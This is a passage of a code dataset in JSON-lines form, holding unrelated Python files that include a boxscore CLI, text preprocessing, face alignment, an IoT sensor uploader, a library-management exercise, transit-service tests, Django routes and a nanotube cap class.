# print()\n # print(translate_gamepk2url(args.game))\n # print()\n # print(extract_decisions(game_data))\n # print()\n print()\n pp.pprint(extract_boxscore_data(game_data), compact=True, indent=1, depth=2)\n print(\"\\n\")\n print(extract_gamedate(game_data))\n print(extract_venue_name(game_data))\n print()\n lines_dense, lines_sparse = format_linescore(\n extract_linescore_innings(game_data),\n extract_teams_data(game_data),\n use_top_spacing_line=False,\n use_bottom_spacing_line=False,\n horz_char=\" \",\n vert_char=\" \",\n cross_char=\" \",\n )\n do_dense = True\n if do_dense:\n [print(line) for line in lines_dense]\n else:\n [print(line) for line in lines_sparse]\n print()\n print(\" \", extract_teams_data(game_data)[\"away\"], sep=\"\")\n print()\n away_info = extract_info_team(game_data, home_team=False)\n [print(line) for line in format_info_team(away_info)]\n print(\"\\n\")\n print(\" \", extract_teams_data(game_data)[\"home\"], sep=\"\")\n print()\n home_info = extract_info_team(game_data, home_team=True)\n [print(line) for line in format_info_team(home_info)]\n print()\n box_info = extract_info_box(game_data)\n [print(line) for line in format_info_box(box_info)]\n print(\"\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"cfrontin/boxscore-cli","sub_path":"boxscore_cli/boxscore.py","file_name":"boxscore.py","file_ext":"py","file_size_in_byte":5903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37603667931","text":"import re\n\n# TextPreprocessing class contains a constructor, question_tag function\n# and stop_word function, question_tag function detects the type of question\n# tag present in the query and stop_word function is used to remove stop words\n# from the user query\n\n\nclass TextPreprocessing:\n def __init__(self):\n pass\n\n # user-defined question_tag function\n # used to detect type of question tag\n # in user query and returns the question tag\n # along with a list containing all possible question tags\n def question_tag(self, query):\n ques_tag = \"\"\n list_ques_tag = ['what', 'What', 'who', 'Who', 'when', 'When',\n 'where', 'Where', 'which', 'Which', 'how', 'How', 'Whom', 'whom']\n # finding the words starting with 'w' or 'W' in the query\n regex = re.findall(r\"\\b[wW]h\\w+|how|How\", query)\n for i in regex:\n ques_tag += i\n return ques_tag, list_ques_tag\n\n # user-defined stop_word function\n # This function is used for punctuation removal,\n # Wh-question removal, stop-word removal and,\n # capitalizing words in the user query\n # returns a refined query containing no stop words\n def stop_word(self, query):\n # importing third-party libraries\n import string\n import nltk\n from nltk.corpus import stopwords\n from nltk.tokenize import word_tokenize\n from spacy.lang.en import English\n # Punctuation removal\n query = query.translate(str.maketrans('', '', string.punctuation))\n # Wh-question removal\n query_array = query.split()\n reg = re.findall(\n r\"\\b[wW]h\\w+|how|How|define|Define|Explain|explain\", query)\n for i in reg:\n if i in query_array:\n query_array.remove(i)\n query = \"\"\n for i in query_array:\n query += i+\" \"\n\n # stop word removal\n stop_words = set(stopwords.words('english'))\n word_tokens = word_tokenize(query)\n filtered_sentence = [w for w in word_tokens if not w in stop_words]\n string_text = \"\"\n for i in filtered_sentence:\n string_text += i+\" \"\n\n # capitalize the words\n query_array = string_text.split()\n output = \"\"\n for i in query_array:\n i = i.capitalize()\n output += i+\" \"\n return output\n","repo_name":"rohit3644/IQAS","sub_path":"textpreprocessing.py","file_name":"textpreprocessing.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8813644425","text":"import cv2\nimport numpy as np\nimport dlib\nimport matplotlib.pyplot as plt\nimport math\n\n''' Face Alignment using the 5-point model.'''\n\n\n# In the 5-point model, the landmark points consists of 2 points at the corners of the eye\n# for each eye and one point on the nose-tip\n\n\ndef face_Detector(image):\n faceDetector = dlib.get_frontal_face_detector()\n faceBboxes = faceDetector(image, 0)\n print(\"Number of faces detected: \", len(faceBboxes))\n return faceBboxes\n\n\ndef land_marks(image, faceBboxes):\n predictorPath = 'models/shape_predictor_5_face_landmarks.dat'\n landMarkDetector = dlib.shape_predictor(predictorPath)\n for i in range(len(faceBboxes)):\n bbox = dlib.rectangle(int(faceBboxes[i].left()), int(faceBboxes[i].top()), int(faceBboxes[i].right()),\n int(faceBboxes[i].bottom()))\n landMarks = landMarkDetector(image, bbox)\n points = []\n for p in landMarks.parts():\n point = (p.x, p.y)\n points.append(point)\n points = np.array(points)\n return points\n\n\ndef similarity_transform(eyecornerSrc, eyecornerDst):\n s60 = math.sin(60 * math.pi / 180)\n c60 = math.cos(60 * math.pi / 180)\n\n inPts = np.copy(eyecornerSrc).tolist()\n outPts = np.copy(eyecornerDst).tolist()\n\n # The third point is calculated so that the three points make an equilateral triangle\n xin = c60 * (inPts[0][0] - inPts[1][0]) - s60 * (inPts[0][1] - inPts[1][1]) + inPts[1][0]\n yin = s60 * (inPts[0][0] - inPts[1][0]) + c60 * (inPts[0][1] - inPts[1][1]) + inPts[1][1]\n\n inPts.append([int(xin), int(yin)])\n\n xout = c60 * (outPts[0][0] - outPts[1][0]) - s60 * (outPts[0][1] - outPts[1][1]) + outPts[1][0]\n yout = s60 * (outPts[0][0] - outPts[1][0]) + c60 * (outPts[0][1] - outPts[1][1]) + outPts[1][1]\n\n outPts.append([int(xout), int(yout)])\n\n # Now we can use estimateRigidTransform for calculating the similarity transform.\n transform = cv2.estimateAffinePartial2D(np.array([inPts]), np.array([outPts]))\n return transform[0]\n\n\ndef alignment(size, image, points):\n h, w = size\n if len(points) == 68:\n eyecornerSrc = [points[36], points[45]]\n elif len(points) == 5:\n eyecornerSrc = [points[2], points[0]]\n # Corners of the eye in normalized image\n eyecornerDst = [(int(0.3 * w), int(h / 3)),\n (int(0.7 * w), int(h / 3))]\n\n transform = similarity_transform(eyecornerSrc, eyecornerDst)\n result = np.zeros(image.shape, dtype=image.dtype)\n result = cv2.warpAffine(image, transform, (w, h))\n points2 = np.reshape(points,\n (points.shape[0], 1, points.shape[1]))\n\n pointsOut = cv2.transform(points2, transform)\n\n pointsOut = np.reshape(pointsOut,\n (points.shape[0], points.shape[1]))\n return result, pointsOut\n\n\nif __name__ == \"__main__\":\n image = cv2.imread(\"images/face1.png\")\n faceBboxes = face_Detector(image)\n points = land_marks(image, faceBboxes)\n h = 600\n w = 600\n im = np.float32(image) / 255.0\n res, points = alignment((h, w), im, points)\n res = np.uint8(res * 255)\n plt.figure(figsize=(20, 8))\n plt.imshow(res[:, :, ::-1])\n plt.title(\"Aligned Image\")\n plt.show()\n","repo_name":"fatemehYP/CV_ML_Projects","sub_path":"face_alignment.py","file_name":"face_alignment.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20195766106","text":"# all configuration settings come from config.py\ntry:\n\timport hana_config as config\nexcept ImportError:\n\tprint(\"__HANA__: Please copy template-config.py to config.py and configure appropriately !\"); exit();\n\ndebug_communication=1\n\nimport urllib3\nimport time\nimport json\n\nimport sys\nimport signal\nimport threading\n\nclass hana_uploader(threading.Thread):\n\tdef __init__(self):\n\t\tthreading.Thread.__init__(self)\n\t\tself.http = self.url = self.headers = self.body = None\n\t\tself.initialized = False\n\t\tself.stop = False\n\t\tself.sensor_data = [ [0,0,0] , [0,0,0] , [0,0,0] , [0,0,0] , [0,0,0] , [0,0,0] , [0,0,0] , [0,0,0] , [0,0,0] , [0,0,0] ]\n\t\n\tdef run(self):\n\t\t# disable InsecureRequestWarning if your are working without certificate verification\n\t\t# see https://urllib3.readthedocs.org/en/latest/security.html\n\t\t# be sure to use a recent enough urllib3 version if this fails\n\t\ttry:\n\t\t\turllib3.disable_warnings()\n\t\texcept:\n\t\t\tprint(\"__HANA__: urllib3.disable_warnings() failed - get a recent enough urllib3 version to avoid potential InsecureRequestWarning warnings! Can and will continue though.\")\n\n\t\t# use with or without proxy\n\t\tif (config.proxy_url == ''):\n\t\t\tself.http = urllib3.PoolManager()\n\t\telse:\n\t\t\tself.http = urllib3.proxy_from_url(config.proxy_url)\n\n\t\tself.url='https://iotmms' + config.hcp_account_id + config.hcp_landscape_host + '/com.sap.iotservices.mms/v1/api/http/data/' + str(config.device_id)\n\n\t\tself.headers = urllib3.util.make_headers(user_agent=None)\n\n\t\t# use with authentication\n\t\tself.headers['Authorization'] = 'Bearer ' + config.oauth_credentials_for_device\n\t\tself.headers['Content-Type'] = 'application/json;charset=utf-8'\n\n\t\tprint(\"__HANA__: Success at IoT Service Config\")\n\n\t\tself.initialized = True\n\n\t\twhile not self.stop:\n\t\t\t\ttime.sleep(1)\n\t\t\t\tself.send_to_hcp(int(time.time()), \"CC2650_01\", self.sensor_data[3][0], self.sensor_data[3][1], self.sensor_data[3][2], self.sensor_data[6][0], self.sensor_data[5][0])\n\n\tdef update_sensor_data(self, sensor_data):\n\t\tself.sensor_data = sensor_data\n\n\tdef set_stop(self):\n\t\tself.stop = True\n\n\tdef is_initialized(self):\n\t\treturn self.initialized\n\n\tdef send_to_hcp(self, TimeStamp, sensor_id, acc_x, acc_y, acc_z, Temp, Hum):\n\t\tbody= self.create_body(TimeStamp, sensor_id, acc_x, acc_y, acc_z, Temp, Hum)\n\t\tself.upload_to_hcp(self.http, self.url, self.headers, body)\n\t\tif (debug_communication == 1):\n\t\t\tprint(\"Sent to HCP\")\n\n\tdef upload_to_hcp(self, http, url, headers, body):\n\t\t#print(timestamp)\n\t\t#print(body)\n\t\t#print(url)\n\t\tr = http.urlopen('POST', url, body=body, headers=headers)\n\t\tif (debug_communication == 1):\n\t\t\tprint(\"__HANA__: send_to_hcp():\" + str(r.status))\n\t\t\tprint(r.data)\n\n\tdef create_body(self, TimeStamp, sensor_id, acc_x, acc_y, acc_z, Temp, Hum):\n\t\tbody='{\"mode\":\"async\",\"messageType\":'+ str(config.message_type_id_From_device) +',\"messages\":[{\"Timestamp\":'+ str(TimeStamp) +',\"Sensor_ID\":'+ str(sensor_id) +',\"ACC_X\":'+ str(acc_x) +',\"ACC_Y\":'+ str(acc_y) +',\"ACC_Z\":'+ str(acc_z) +',\"Temperature\":'+ str(Temp) +',\"Humidity\":'+ str(Hum) +'}]}'\n\t\treturn body\n\n\tdef poll_from_hcp(self, http, url, headers):\n\t\tglobal msg_string\n\n\t\tr = http.urlopen('GET', url, headers=headers)\n\t\tif (debug_communication == 1):\n\t\t\tprint(\"poll_from_hcp():\" + str(r.status))\n\t\t\tprint(r.data)\n\t\tjson_string='{\"all_messages\":'+(r.data).decode(\"utf-8\")+'}'\n\t\t# print(json_string)\n\n\t\ttry:\n\t\t\tjson_string_parsed=json.loads(json_string)\n\t\t\t# print(json_string_parsed)\n\t\t\t# take care: if multiple messages arrive in 1 payload - their order is last in / first out - so we need to traverse in reverese order\n\t\t\ttry:\n\t\t\t\tmessages_reversed=reversed(json_string_parsed[\"all_messages\"])\n\t\t\t\tfor single_message in messages_reversed:\n\t\t\t\t\t# print(single_message)\n\t\t\t\t\tpayload=single_message[\"messages\"][0]\n\t\t\t\t\topcode=payload[\"opcode\"]\n\t\t\t\t\toperand=payload[\"operand\"]\n\t\t\t\t\t# print(opcode)\n\t\t\t\t\t# print(operand)\n\t\t\t\t\t# now do things depending on the opcode\n\t\t\t\t\tif (opcode == \"display\"):\n\t\t\t\t\t\t# print(operand)\n\t\t\t\t\t\t# we write to the display at one centralized point only\n\t\t\t\t\t\tmsg_string=operand\n\t\t\t\t\tif (opcode == \"led\"):\n\t\t\t\t\t\tif (operand == \"0\"):\n\t\t\t\t\t\t\t# print(\"LED off\")\n\t\t\t\t\t\t\tswitch_led(0)\n\t\t\t\t\t\tif (operand == \"1\"):\n\t\t\t\t\t\t\t# print(\"LED on\")\n\t\t\t\t\t\t\tswitch_led(1)\n\t\t\texcept TypeError:\n\t\t\t\tprint(\"__HANA__: Problem decoding the message \" + (r.data).decode(\"utf-8\") + \" retrieved with poll_from_hcp()! Can and will continue though.\")\n\t\texcept ValueError:\n\t\t\tprint(\"__HANA__: Problem decoding the message \" + (r.data).decode(\"utf-8\") + \" retrieved with poll_from_hcp()! Can and will continue though.\")\n\t\t\nif __name__ == '__main__':\n\thana_uploader()\n\tprint(\"Done.\")\n","repo_name":"varappavoo/sensorTag-2","sub_path":"hana_upload.py","file_name":"hana_upload.py","file_ext":"py","file_size_in_byte":4618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74852386153","text":"'''\n文件操作一般步骤:\n打开文件、读写文件、保存文件、关闭文件\n'''\n# 打开文件:open(路径, 打开模式)\n# 常用模式:\n# r:默认模式,以只读方式打开,文件指针会放在文件开头\n# w:写入,已存在就覆盖,不存在就创建\n# a:追加,存在就指针放结尾,不存在就创建\n\n# 打开文件\n# 注意,默认打开的编码模式是GBK\n# 最好在打开时指定一个编码类型\nfile = open('./12-文件读写/test.txt', 'w', encoding='utf-8')\n\n# 读写文件\nfile.write('我爱China')\nfile.write('\\n无产阶级,联合起来!') # 注意,w模式下打开会覆盖\n\n# 保存并关闭文件\nfile.close()\n\n# 以二进制方式读写\nfile = open('./12-文件读写/test1.txt', 'wb')\nfile.write('叔叔我啊,最喜欢钱了'.encode('utf-8')) # 注意,用encode是把字符串转换成了bytes\nfile.close()\n\n# 追加方式(有不覆盖,没有就创建)\nfile = open('./12-文件读写/test1.txt', 'a', encoding='utf-8')\nfile.write('\\n曹仁,南蛮什么时候杀啊') # 不是二进制就不需要用encode\nfile.write('\\n你所热爱的,就是你的生活!')\nfile.close()\n\n# 二进制追加\nfile = open('./12-文件读写/test1.txt', 'ab')\nfile.write('\\n我们承诺:……'.encode('utf-8'))\nfile.close()\n","repo_name":"529106896/PythonLearning","sub_path":"py-project/12-文件读写/01-文件写.py","file_name":"01-文件写.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12037474742","text":"import pytest\n\nfrom transiter import exceptions\nfrom transiter.db import models\nfrom transiter.db.queries import alertqueries, tripqueries, routequeries\nfrom transiter.services import tripservice, views\n\n\ndef test_list_all_in_route__route_not_found(monkeypatch, route_1_model):\n monkeypatch.setattr(\n routequeries, \"get_in_system_by_id\", lambda *args, **kwargs: None\n )\n\n with pytest.raises(exceptions.IdNotFoundError):\n tripservice.list_all_in_route(route_1_model.system.id, route_1_model.id)\n\n\ndef test_list_all_in_route(\n monkeypatch,\n route_1_model,\n trip_1_model,\n trip_1_view,\n trip_2_model,\n trip_2_view,\n stop_1_model,\n stop_1_small_view,\n stop_2_model,\n stop_2_small_view,\n):\n monkeypatch.setattr(\n routequeries, \"get_in_system_by_id\", lambda *args, **kwargs: route_1_model\n )\n monkeypatch.setattr(\n tripqueries,\n \"list_all_in_route_by_pk\",\n lambda *args, **kwargs: [trip_1_model, trip_2_model],\n )\n monkeypatch.setattr(\n tripqueries,\n \"get_trip_pk_to_last_stop_map\",\n lambda *args, **kwargs: {\n trip_1_model.pk: stop_1_model,\n trip_2_model.pk: stop_2_model,\n },\n )\n monkeypatch.setattr(\n alertqueries, \"get_trip_pk_to_active_alerts\", lambda *args, **kwargs: {}\n )\n\n expected = [trip_1_view, trip_2_view]\n\n expected[0].last_stop = stop_1_small_view\n expected[0].alerts = []\n expected[0].vehicle = None\n expected[1].last_stop = stop_2_small_view\n expected[1].alerts = []\n expected[1].vehicle = None\n\n actual = tripservice.list_all_in_route(route_1_model.system.id, route_1_model.id)\n\n assert expected == actual\n\n\ndef test_get_in_route_by_id__trip_not_found(monkeypatch, trip_1_model):\n monkeypatch.setattr(tripqueries, \"get_in_route_by_id\", lambda *args, **kwargs: None)\n\n with pytest.raises(exceptions.IdNotFoundError):\n tripservice.get_in_route_by_id(\n trip_1_model.route.system.id, trip_1_model.route.id, trip_1_model.id\n )\n\n\ndef test_get_in_route_by_id(\n monkeypatch,\n route_1_model,\n route_1_small_view,\n trip_1_model,\n trip_1_view,\n stop_1_model,\n stop_1_small_view,\n):\n monkeypatch.setattr(\n tripqueries, \"get_in_route_by_id\", lambda *args, **kwargs: trip_1_model\n )\n monkeypatch.setattr(\n alertqueries, \"get_trip_pk_to_active_alerts\", lambda *args, **kwargs: {}\n )\n\n stop_time = models.TripStopTime(stop_sequence=1)\n stop_time.stop = stop_1_model\n trip_1_model.stop_times = [stop_time]\n\n expected = trip_1_view\n expected.stop_times = [views.TripStopTime.from_model(stop_time)]\n expected.alerts = []\n expected.vehicle = None\n expected.route = route_1_small_view\n expected.stop_times[0].stop = stop_1_small_view\n\n actual = tripservice.get_in_route_by_id(\n trip_1_model.route.system.id, trip_1_model.route.id, trip_1_model.id\n )\n\n assert expected == actual\n","repo_name":"jamespfennell/transiter-python","sub_path":"tests/unit/services/test_tripservice.py","file_name":"test_tripservice.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20167440320","text":"import PyPDF2\nimport textract\nimport os\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nimport nltk\nimport string\nfrom itertools import islice\nnltk.download('punkt')\nnltk.download('stopwords')\nnltk.download('averaged_perceptron_tagger')\n\ndef get_pdf_title(pdf_file_path):\n pdf_reader = PyPDF2.PdfFileReader(open(pdf_file_path, \"rb\")) \n return pdf_reader.getDocumentInfo().title\n\ndef get_tags(filename):\n \"\"\"Reads Most frequent tags appearing in the PDF or Image\"\"\"\n extension = filename.split('.')[-1];\n text = \"\"\n title = \"\"\n if extension == 'pdf':\n pdfFileObj = open(filename,'rb')\n pdfReader = PyPDF2.PdfFileReader(pdfFileObj)\n num_pages = pdfReader.numPages\n count = 0\n\n #The while loop will read each page.\n while count < num_pages:\n pageObj = pdfReader.getPage(count)\n count +=1\n text += pageObj.extractText()\n\n title = get_pdf_title(filename)\n\n if title:\n text += \" \" + title\n\n if text == \"\":\n text = textract.process(os.path.join(os.getcwd(), filename), method='tesseract', language='eng')\n\n if not isinstance(text, str):\n text = text.decode(\"utf-8\")\n\n tokens = word_tokenize(text)\n if title:\n tokens += word_tokenize(title) \n\n stop_words = string.punctuation #set(stopwords.words('english') + list(string.punctuation))\n # stop_words = set(stopwords.words('english') + list(string.punctuation))\n\n keywords = [word for word in tokens if not word in stop_words]\n\n #removing everything except nouns\n tags = nltk.pos_tag(keywords)\n nouns = [word for word,pos in tags if (pos == 'NN' or pos == 'NNP' or pos == 'NNS' or pos == 'NNPS')]\n # print(keywords)\n\n keyword_freqency = dict()\n\n for word in nouns:\n keyword_freqency[word] = keyword_freqency.get(word, 0) + 1\n\n sorted_keywords = {\n k: v for k, \n v in sorted(keyword_freqency.items(), key=lambda item: item[1], reverse=True)\n }\n frequent_keywords = list(islice(sorted_keywords, 10))\n return frequent_keywords\n\n\nfilename = 'UPSC FORM FURKAN.pdf'\n# filename = 'NPR_NRIC.PNG' \n# filename = 'RCA-XOVER-JIRA.pdf' \n\n# print(\"Tags\", get_tags(filename))\n\n","repo_name":"tabishmahfuz1/document-parser","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44216223143","text":"#!/usr/bin/env python3\nimport random\n\nclass Personne:\n\n def __init__(self, nom, prenom):\n self.nom = nom\n self.prenom = prenom\n\n def se_presenter(self):\n print(\"Je suis {} {}\".format(self.prenom, self.nom))\n\n def __repr__(self):\n print(\"Je suis {} {}\".format(self.prenom, self.nom))\n\n def _get_prenom(self):\n try:\n return self.prenom\n except:\n print(\"Cannot get prenom\")\n\n def _get_nom(self):\n try:\n return self.nom\n except:\n print(\"Cannot get nom\")\n\n def _set_prenom(self, newPrenom):\n try:\n self.prenom = newPrenom\n except:\n print(\"Cannot set nom\")\n\n def _set_nom(self, newName):\n try:\n self.nom = newName\n except:\n print(\"Cannot set nom\")\n property(_get_nom, _set_nom)\n property(_get_prenom, _set_prenom)\n\nclass Auteur(Personne):\n\n def __init__(self, nom, prenom):\n self.oeuvre = []\n super().__init__(nom, prenom)\n\n def listerOeuvre(self):\n print(\"Moi, {} {} j'ai fierement écrit {} livre{}, les voicis \".format(self.nom, self.prenom, len(self.oeuvre), \"s\" if len(self.oeuvre) > 1 else \"\"))\n for oeuvre in self.oeuvre:\n print(\"-{}\".format(oeuvre.titre))\n print(\"Mais d'autres histoires sont encore a venir !\")\n\n def ecrireLivre(self, titre):\n self.oeuvre.append(Livre(titre, self))\n\n\nclass Client(Personne):\n def __init__(self, nom, prenom):\n self.collection = []\n super().__init__(nom, prenom)\n\n def inventaire(self):\n print(\"Moi, {} {} j'ai fierement loué {} livre{}, les voicis \".format(self.nom, self.prenom, len(self.collection), \"s\" if len(self.collection) > 1 else \"\"))\n for oeuvre in self.collection:\n print(\"-{}\\n\".format(oeuvre))\n print(\"Mais j'ai toujours plus faim d'histoires\")\n\n\nclass Livre:\n\n def __init__(self, titre, auteur):\n if type(auteur) is Auteur:\n self.titre = titre\n self.auteur = auteur\n else :\n raise TypeError(\"Author is an Author type\")\n\n def print(self):\n print(\"Titre:{} Auteur:{}\".format(self.titre, self.auteur))\n\nclass Bibliotheque:\n\n def __init__(self, nom, catalogue=[]):\n self.nom = nom\n self.catalogue = catalogue\n\n def acheterLivre(self, autor, livre_titre, quantite):\n for livre in autor.oeuvre:\n if livre.titre == livre_titre:\n self.catalogue[livre_titre] = quantite\n return\n print(\"Pas de {} dans la biblio de {} {} !\".format(livre_titre, autor.nom, autor.prenom))\n\n def inventaire(self):\n print(\"Nous avons {} livre{}, les voicis \".format(len(self.catalogue), \"s\" if len(self.catalogue) > 1 else \"\"))\n for livre in self.catalogue:\n print(\"{} {} en {} exemplaire{}\".format(livre, self.catalogue[livre],len(self.catalogue), \"s\" if len(self.catalogue)>1 else \"\"))\n\n def louerLivre(self, client, nom_livre):\n if nom_livre in self.catalogue :\n self.catalogue[nom_livre] -= 1\n client.collection.append(nom_livre)\n else :\n print(\"Pas de ca dans notre biblio !\")\n\n def rendreLivre(self, client, livre):\n if livre in client.collection:\n for i in range(len(client.collection)):\n if client.collection[i] == livre:\n del client.collection[i]\n break\n self.catalogue[livre] += 1\n else :\n print(\"Le client {} {} n'as pas le livre {}\".format(client.nom, client.prenom, livre))\n\na = Personne('a', 'aaron')\n#a.se_presenter()\n\naut = Auteur('au', 'aut')\naut.ecrireLivre('Magazine IKEA')\naut.ecrireLivre('la bible')\n#aut.listerOeuvre()\n\ncli = Client('cli', 'Client')\ncli.inventaire()\n\nbi = Bibliotheque('sacre coeur', {})\nbi.louerLivre(cli, 'Magazine IKEA')\nbi.acheterLivre(aut, 'Magazine IKEA', 4)\nbi.inventaire()\nbi.louerLivre(cli, 'Magazine IKEA')\ncli.inventaire()\nbi.inventaire()\nbi.rendreLivre(cli, 'Magazine IKEA')\n\nbi.inventaire()\ncli.inventaire()\n","repo_name":"samuel-joly/runtrack-python","sub_path":"jour02/job07/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4113,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3333057166","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 5 17:56:11 2022\r\n\r\n@author: Nevermore\r\n\"\"\"\r\n\r\nfrom practice_class import Pessoa\r\n\r\np1 = Pessoa(\"Nevermore\", 22)\r\np2 = Pessoa(\"Mat\", 22)\r\np1.falar(\"Rocket League\")\r\np2.falar(\"química\")\r\nprint(p1.ano_atual)\r\nprint(Pessoa.ano_atual)\r\n\r\nprint(p1.ano_nascimento())","repo_name":"n3vrmr/class-pclp","sub_path":"importing_class.py","file_name":"importing_class.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20998787596","text":"from django.conf.urls import patterns, include, url\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # url(r'^$', 'DocuCanvas.views.home', name='home'),\n # url(r'^DocuCanvas/', include('DocuCanvas.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n (r'^$', 'dashboard.views.dashboard'),\n url(r'^admin/doc/', include('django.contrib.admindocs.urls')), # wjmazza - 2013.06.27 - This used/needed?\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n url(r'^accounts/', include('auth.urls')),\n #\n url(r'^acct/', include('accounts.urls')), # wjmazza - 2013.06.27 - This used/needed?\n url(r'^bug/', include('bugs.urls')), # wjmazza - 2013.06.27 - This used/needed?\n url(r'^board/', include('boards.urls')),\n #url(r'^suggestion/', include('suggestions.urls')),\n #url(r'^task/', include('tasks.urls')),\n #url(r'^node/', include('nodes.urls')),\n url(r'^notification/', include('notifications.urls')),\n url(r'^newsfeed/', include('newsfeed.urls')),\n url(r'^checklist/', include('checklists.urls')),\n url(r'^project/', include('projects.urls')),\n url(r'^issue/', include('issues.urls')),\n url(r'^reports/', include('daily_reports.urls')),\n url(r'^auth/', include('auth.urls')),\n url(r'^food/', include('food.urls')),\n url(r'^help/', include('helpdesknew.urls')),\n url(r'^gapps/', include('gapps.urls')),\n # url(r'^tinymmce/', include('tinymce.urls')),\n url(r'^charts/', include('charts.urls')),\n #url(r'^facebook/', include('facebook.urls')),\n #url(r'^twitter/', include('twitter.urls')),\n url(r'^socialplatform/', include('socialplatform.urls')),\n url(r'^polls/', include('polls.urls')),\n url(r'^feedback/', include('feedback.urls')),\n #\n url(r'^docs/', include('docs.urls')), # wjmazza - 2013.07.09 - TEMP - R&D Test View\n url(r'^sitesearch', include('search.urls')),\n url(r'^research/', include('taxes.urls')),\n url(r'^sprints/', include('sprints.urls')),\n url(r'^git/', include('gitHooks.urls')),\n)\n","repo_name":"tekton/DocuCanvas","sub_path":"DocuCanvas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38560430988","text":"import pygame\nimport random\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\n\nclass Box(pygame.sprite.Sprite):\n def __init__(self, x, y, speed, color):\n super().__init__()\n self.x = x\n self.y = y\n self.w = random.randint(31, 100)\n self.h = random.randint(31, 50)\n self.image = pygame.Surface((self.w, self.h)) # 平面\n self.image.fill(color)\n self.rect = self.image.get_rect() # 取得長方形\n self.rect.x = self.x\n self.rect.y = self.y\n self.speed = speed\n\n def update(self):\n self.rect.x -= self.speed","repo_name":"0204ryan/box","sub_path":"box.py","file_name":"box.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39326734066","text":"from nanocap.core.globals import *\nimport os,sys,math,copy,random,time\nimport numpy\nimport nanocap.core.points as points\nfrom nanocap.core.util import *\n\nfrom nanocap.clib import clib_interface\nfrom nanocap.structures.structure import Structure\nclib = clib_interface.clib\n\nclass Cap(Structure):\n def __init__(self,secondary=False):\n if(secondary):\n Structure.__init__(self,STRUCTURE_TYPES[CAP_R])\n #self.type = StructureType(CAP_R,\"CAP_R\",\"Cap Secondary\")\n else:\n Structure.__init__(self,STRUCTURE_TYPES[CAP])\n #self.type = StructureType(CAP,\"CAP\",\"Cap Primary\")\n \n def __repr__(self):\n out = super(Cap, self).__repr__() \n return out\n \n def set_carbon_lattice(self,npoints,pos):\n self.carbon_lattice = points.Points(\"Cap Carbon Lattice\")\n self.carbon_lattice.initArrays(npoints)\n self.carbon_lattice.pos = numpy.copy(pos)\n \n \n def setup(self,npoints,free = True, real=True,seed=None,): \n self.dual_lattice = points.Points(\"Cap Dual Lattice Points\")\n \n self.dual_lattice.initArrays(npoints)\n \n if(free==True):\n self.dual_lattice.freeflags = numpy.ones(npoints,NPI)\n self.dual_lattice.freeflagspos = numpy.ones(npoints*3,NPF)\n else:\n self.dual_lattice.freeflags = numpy.zeros(npoints,NPI)\n self.dual_lattice.freeflagspos = numpy.zeros(npoints*3,NPF)\n \n if(real==True): \n self.dual_lattice.realflags = numpy.ones(npoints,NPI)\n self.dual_lattice.realflagspos = numpy.ones(npoints*3,NPF)\n else:\n self.dual_lattice.realflags = numpy.zeros(npoints,NPI)\n self.dual_lattice.realflags = numpy.zeros(npoints*3,NPF)\n \n self.dual_lattice.dampflags = numpy.zeros(npoints,NPI)\n self.dual_lattice.dampflagspos = numpy.zeros(npoints*3,NPF)\n \n if(seed==None):\n seed = random.randint(1,100000) \n self.seed = seed \n random.seed(seed)\n sphere_rad = 1.0\n clib.setup_random_points_on_sphere(ctypes.c_int(npoints),\n ctypes.c_int(seed),\n ctypes.c_int(1),\n ctypes.c_double(sphere_rad),\n self.dual_lattice.pos.ctypes.data_as(ctypes.POINTER(ctypes.c_double)))\n \n #set up free atoms on the sphere cap (moved during minimisation)\n # z = -1 to 0 with nanotube from 0 to l \n\n self.dual_lattice.pos0 = numpy.copy(self.dual_lattice.pos) \n printl(\"cap thomson density\",self.dual_lattice.npoints,self.dual_lattice.npoints/(2*math.pi))\n \n N_cap_carbon = NAtoms_from_NDual(npoints,surface=\"cap\")\n self.set_carbon_lattice(N_cap_carbon,None)\n ","repo_name":"CurtinIC/nanocap","sub_path":"nanocap/structures/cap.py","file_name":"cap.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"71300172394","text":"import os\nfrom os import listdir\nimport json\nimport nltk\nimport csv\nimport enchant\nfrom nltk.corpus import words\nfrom nltk.corpus import wordnet as wn\nfrom nltk.corpus import sentiwordnet as swn\n\n\nrootdir = 'blog and comments/'\ncomments_rootdir = 'received blog 